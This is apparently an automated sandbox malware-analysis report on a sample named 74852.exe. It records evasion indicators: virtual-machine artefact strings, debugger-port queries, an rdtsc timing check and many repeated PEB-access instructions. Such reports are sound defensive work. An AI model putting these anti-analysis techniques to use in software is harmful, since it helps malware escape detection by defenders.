Source: explorer.exe, 00000002.00000000.270582672.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S##
Source: explorer.exe, 00000002.00000000.270582672.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000002.00000000.255880997.00000000048E0000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.270582672.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000002.00000000.268504207.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000002.00000000.268504207.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.261751329.00000000069DA000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD002
Source: explorer.exe, 00000002.00000000.259692429.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.259692429.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.259692429.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\74852.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\74852.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\74852.exe

Code function: 1_2_00409A90 rdtsc

1_2_00409A90

Source: C:\Users\user\Desktop\74852.exe

Code function: 1_2_0040ACD0 LdrLoadDll,

1_2_0040ACD0

Source: C:\Users\user\Desktop\74852.exe	Code function: 0_2_00237790 mov eax, dword ptr fs:[00000030h]	0_2_00237790
Source: C:\Users\user\Desktop\74852.exe	Code function: 0_2_0115F016 mov eax, dword ptr fs:[00000030h]	0_2_0115F016
Source: C:\Users\user\Desktop\74852.exe	Code function: 0_2_0115F885 mov eax, dword ptr fs:[00000030h]	0_2_0115F885
Source: C:\Users\user\Desktop\74852.exe	Code function: 0_2_0115F925 mov eax, dword ptr fs:[00000030h]	0_2_0115F925
Source: C:\Users\user\Desktop\74852.exe	Code function: 0_2_0115F8C2 mov eax, dword ptr fs:[00000030h]	0_2_0115F8C2
Source: C:\Users\user\Desktop\74852.exe	Code function: 0_2_0115FA6D mov eax, dword ptr fs:[00000030h]	0_2_0115FA6D
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_00237790 mov eax, dword ptr fs:[00000030h]	1_2_00237790
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01453D43 mov eax, dword ptr fs:[00000030h]	1_2_01453D43
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0143B944 mov eax, dword ptr fs:[00000030h]	1_2_0143B944
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0143B944 mov eax, dword ptr fs:[00000030h]	1_2_0143B944
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01493540 mov eax, dword ptr fs:[00000030h]	1_2_01493540
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01437D50 mov eax, dword ptr fs:[00000030h]	1_2_01437D50
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141C962 mov eax, dword ptr fs:[00000030h]	1_2_0141C962
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141B171 mov eax, dword ptr fs:[00000030h]	1_2_0141B171
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141B171 mov eax, dword ptr fs:[00000030h]	1_2_0141B171
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0143C577 mov eax, dword ptr fs:[00000030h]	1_2_0143C577
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0143C577 mov eax, dword ptr fs:[00000030h]	1_2_0143C577
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01419100 mov eax, dword ptr fs:[00000030h]	1_2_01419100
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01419100 mov eax, dword ptr fs:[00000030h]	1_2_01419100
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01419100 mov eax, dword ptr fs:[00000030h]	1_2_01419100
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01434120 mov eax, dword ptr fs:[00000030h]	1_2_01434120
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01434120 mov eax, dword ptr fs:[00000030h]	1_2_01434120
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01434120 mov eax, dword ptr fs:[00000030h]	1_2_01434120
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01434120 mov eax, dword ptr fs:[00000030h]	1_2_01434120
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01434120 mov ecx, dword ptr fs:[00000030h]	1_2_01434120
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141AD30 mov eax, dword ptr fs:[00000030h]	1_2_0141AD30
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014DE539 mov eax, dword ptr fs:[00000030h]	1_2_014DE539
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]	1_2_01423D34
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]	1_2_01423D34
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]	1_2_01423D34
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]	1_2_01423D34
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]	1_2_01423D34
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]	1_2_01423D34
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]	1_2_01423D34
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]	1_2_01423D34
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]	1_2_01423D34
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]	1_2_01423D34
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]	1_2_01423D34
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]	1_2_01423D34
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]	1_2_01423D34
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E8D34 mov eax, dword ptr fs:[00000030h]	1_2_014E8D34
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144513A mov eax, dword ptr fs:[00000030h]	1_2_0144513A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144513A mov eax, dword ptr fs:[00000030h]	1_2_0144513A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0149A537 mov eax, dword ptr fs:[00000030h]	1_2_0149A537
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01444D3B mov eax, dword ptr fs:[00000030h]	1_2_01444D3B
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01444D3B mov eax, dword ptr fs:[00000030h]	1_2_01444D3B
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01444D3B mov eax, dword ptr fs:[00000030h]	1_2_01444D3B
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]	1_2_01496DC9
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]	1_2_01496DC9
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]	1_2_01496DC9
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01496DC9 mov ecx, dword ptr fs:[00000030h]	1_2_01496DC9
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]	1_2_01496DC9
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01496DC9 mov eax, dword ptr fs:[00000030h]	1_2_01496DC9
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0141B1E1
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0141B1E1
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0141B1E1
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014A41E8 mov eax, dword ptr fs:[00000030h]	1_2_014A41E8
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0142D5E0 mov eax, dword ptr fs:[00000030h]	1_2_0142D5E0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0142D5E0 mov eax, dword ptr fs:[00000030h]	1_2_0142D5E0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014DFDE2 mov eax, dword ptr fs:[00000030h]	1_2_014DFDE2
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014DFDE2 mov eax, dword ptr fs:[00000030h]	1_2_014DFDE2
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014DFDE2 mov eax, dword ptr fs:[00000030h]	1_2_014DFDE2
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014DFDE2 mov eax, dword ptr fs:[00000030h]	1_2_014DFDE2
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014C8DF1 mov eax, dword ptr fs:[00000030h]	1_2_014C8DF1
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144A185 mov eax, dword ptr fs:[00000030h]	1_2_0144A185
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0143C182 mov eax, dword ptr fs:[00000030h]	1_2_0143C182
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01442581 mov eax, dword ptr fs:[00000030h]	1_2_01442581
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01442581 mov eax, dword ptr fs:[00000030h]	1_2_01442581
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01442581 mov eax, dword ptr fs:[00000030h]	1_2_01442581
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01442581 mov eax, dword ptr fs:[00000030h]	1_2_01442581
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h]	1_2_01412D8A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h]	1_2_01412D8A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h]	1_2_01412D8A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h]	1_2_01412D8A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01412D8A mov eax, dword ptr fs:[00000030h]	1_2_01412D8A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01442990 mov eax, dword ptr fs:[00000030h]	1_2_01442990
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144FD9B mov eax, dword ptr fs:[00000030h]	1_2_0144FD9B
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144FD9B mov eax, dword ptr fs:[00000030h]	1_2_0144FD9B
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E05AC mov eax, dword ptr fs:[00000030h]	1_2_014E05AC
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E05AC mov eax, dword ptr fs:[00000030h]	1_2_014E05AC
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014461A0 mov eax, dword ptr fs:[00000030h]	1_2_014461A0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014461A0 mov eax, dword ptr fs:[00000030h]	1_2_014461A0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014435A1 mov eax, dword ptr fs:[00000030h]	1_2_014435A1
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014969A6 mov eax, dword ptr fs:[00000030h]	1_2_014969A6
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01441DB5 mov eax, dword ptr fs:[00000030h]	1_2_01441DB5
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01441DB5 mov eax, dword ptr fs:[00000030h]	1_2_01441DB5
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01441DB5 mov eax, dword ptr fs:[00000030h]	1_2_01441DB5
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014951BE mov eax, dword ptr fs:[00000030h]	1_2_014951BE
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014951BE mov eax, dword ptr fs:[00000030h]	1_2_014951BE
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014951BE mov eax, dword ptr fs:[00000030h]	1_2_014951BE
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014951BE mov eax, dword ptr fs:[00000030h]	1_2_014951BE
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144A44B mov eax, dword ptr fs:[00000030h]	1_2_0144A44B
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01430050 mov eax, dword ptr fs:[00000030h]	1_2_01430050
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01430050 mov eax, dword ptr fs:[00000030h]	1_2_01430050
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014AC450 mov eax, dword ptr fs:[00000030h]	1_2_014AC450
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014AC450 mov eax, dword ptr fs:[00000030h]	1_2_014AC450
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0143746D mov eax, dword ptr fs:[00000030h]	1_2_0143746D
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E1074 mov eax, dword ptr fs:[00000030h]	1_2_014E1074
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D2073 mov eax, dword ptr fs:[00000030h]	1_2_014D2073
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E740D mov eax, dword ptr fs:[00000030h]	1_2_014E740D
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E740D mov eax, dword ptr fs:[00000030h]	1_2_014E740D
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E740D mov eax, dword ptr fs:[00000030h]	1_2_014E740D
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01496C0A mov eax, dword ptr fs:[00000030h]	1_2_01496C0A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01496C0A mov eax, dword ptr fs:[00000030h]	1_2_01496C0A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01496C0A mov eax, dword ptr fs:[00000030h]	1_2_01496C0A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01496C0A mov eax, dword ptr fs:[00000030h]	1_2_01496C0A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]	1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]	1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]	1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]	1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]	1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]	1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]	1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]	1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]	1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]	1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]	1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]	1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]	1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D1C06 mov eax, dword ptr fs:[00000030h]	1_2_014D1C06
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E4015 mov eax, dword ptr fs:[00000030h]	1_2_014E4015
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E4015 mov eax, dword ptr fs:[00000030h]	1_2_014E4015
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01497016 mov eax, dword ptr fs:[00000030h]	1_2_01497016
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01497016 mov eax, dword ptr fs:[00000030h]	1_2_01497016
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01497016 mov eax, dword ptr fs:[00000030h]	1_2_01497016
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0142B02A mov eax, dword ptr fs:[00000030h]	1_2_0142B02A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0142B02A mov eax, dword ptr fs:[00000030h]	1_2_0142B02A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0142B02A mov eax, dword ptr fs:[00000030h]	1_2_0142B02A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0142B02A mov eax, dword ptr fs:[00000030h]	1_2_0142B02A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144BC2C mov eax, dword ptr fs:[00000030h]	1_2_0144BC2C
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144002D mov eax, dword ptr fs:[00000030h]	1_2_0144002D
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144002D mov eax, dword ptr fs:[00000030h]	1_2_0144002D
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144002D mov eax, dword ptr fs:[00000030h]	1_2_0144002D
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144002D mov eax, dword ptr fs:[00000030h]	1_2_0144002D
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144002D mov eax, dword ptr fs:[00000030h]	1_2_0144002D
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E8CD6 mov eax, dword ptr fs:[00000030h]	1_2_014E8CD6
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h]	1_2_014AB8D0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014AB8D0 mov ecx, dword ptr fs:[00000030h]	1_2_014AB8D0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h]	1_2_014AB8D0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h]	1_2_014AB8D0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h]	1_2_014AB8D0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014AB8D0 mov eax, dword ptr fs:[00000030h]	1_2_014AB8D0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014158EC mov eax, dword ptr fs:[00000030h]	1_2_014158EC
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D14FB mov eax, dword ptr fs:[00000030h]	1_2_014D14FB
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01496CF0 mov eax, dword ptr fs:[00000030h]	1_2_01496CF0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01496CF0 mov eax, dword ptr fs:[00000030h]	1_2_01496CF0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01496CF0 mov eax, dword ptr fs:[00000030h]	1_2_01496CF0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01419080 mov eax, dword ptr fs:[00000030h]	1_2_01419080
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01493884 mov eax, dword ptr fs:[00000030h]	1_2_01493884
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01493884 mov eax, dword ptr fs:[00000030h]	1_2_01493884
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0142849B mov eax, dword ptr fs:[00000030h]	1_2_0142849B
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]	1_2_014420A0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]	1_2_014420A0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]	1_2_014420A0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]	1_2_014420A0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]	1_2_014420A0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014420A0 mov eax, dword ptr fs:[00000030h]	1_2_014420A0
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014590AF mov eax, dword ptr fs:[00000030h]	1_2_014590AF
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144F0BF mov ecx, dword ptr fs:[00000030h]	1_2_0144F0BF
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144F0BF mov eax, dword ptr fs:[00000030h]	1_2_0144F0BF
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144F0BF mov eax, dword ptr fs:[00000030h]	1_2_0144F0BF
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141DB40 mov eax, dword ptr fs:[00000030h]	1_2_0141DB40
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0142EF40 mov eax, dword ptr fs:[00000030h]	1_2_0142EF40
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E8B58 mov eax, dword ptr fs:[00000030h]	1_2_014E8B58
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141F358 mov eax, dword ptr fs:[00000030h]	1_2_0141F358
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0141DB60 mov ecx, dword ptr fs:[00000030h]	1_2_0141DB60
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0142FF60 mov eax, dword ptr fs:[00000030h]	1_2_0142FF60
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E8F6A mov eax, dword ptr fs:[00000030h]	1_2_014E8F6A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01443B7A mov eax, dword ptr fs:[00000030h]	1_2_01443B7A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01443B7A mov eax, dword ptr fs:[00000030h]	1_2_01443B7A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E070D mov eax, dword ptr fs:[00000030h]	1_2_014E070D
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014E070D mov eax, dword ptr fs:[00000030h]	1_2_014E070D
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144A70E mov eax, dword ptr fs:[00000030h]	1_2_0144A70E
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144A70E mov eax, dword ptr fs:[00000030h]	1_2_0144A70E
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0143F716 mov eax, dword ptr fs:[00000030h]	1_2_0143F716
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D131B mov eax, dword ptr fs:[00000030h]	1_2_014D131B
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014AFF10 mov eax, dword ptr fs:[00000030h]	1_2_014AFF10
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014AFF10 mov eax, dword ptr fs:[00000030h]	1_2_014AFF10
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01414F2E mov eax, dword ptr fs:[00000030h]	1_2_01414F2E
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01414F2E mov eax, dword ptr fs:[00000030h]	1_2_01414F2E
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144E730 mov eax, dword ptr fs:[00000030h]	1_2_0144E730
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014953CA mov eax, dword ptr fs:[00000030h]	1_2_014953CA
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014953CA mov eax, dword ptr fs:[00000030h]	1_2_014953CA
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]	1_2_014403E2
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]	1_2_014403E2
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]	1_2_014403E2
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]	1_2_014403E2
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]	1_2_014403E2
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014403E2 mov eax, dword ptr fs:[00000030h]	1_2_014403E2
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0143DBE9 mov eax, dword ptr fs:[00000030h]	1_2_0143DBE9
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014537F5 mov eax, dword ptr fs:[00000030h]	1_2_014537F5
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014D138A mov eax, dword ptr fs:[00000030h]	1_2_014D138A
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_014CD380 mov ecx, dword ptr fs:[00000030h]	1_2_014CD380
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01421B8F mov eax, dword ptr fs:[00000030h]	1_2_01421B8F
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01421B8F mov eax, dword ptr fs:[00000030h]	1_2_01421B8F
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01442397 mov eax, dword ptr fs:[00000030h]	1_2_01442397
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_0144B390 mov eax, dword ptr fs:[00000030h]	1_2_0144B390
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01428794 mov eax, dword ptr fs:[00000030h]	1_2_01428794
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01497794 mov eax, dword ptr fs:[00000030h]	1_2_01497794
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01497794 mov eax, dword ptr fs:[00000030h]	1_2_01497794
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01497794 mov eax, dword ptr fs:[00000030h]	1_2_01497794
Source: C:\Users\user\Desktop\74852.exe	Code function: 1_2_01444BAD mov eax, dword ptr fs:[00000030h]	1_2_01444BAD
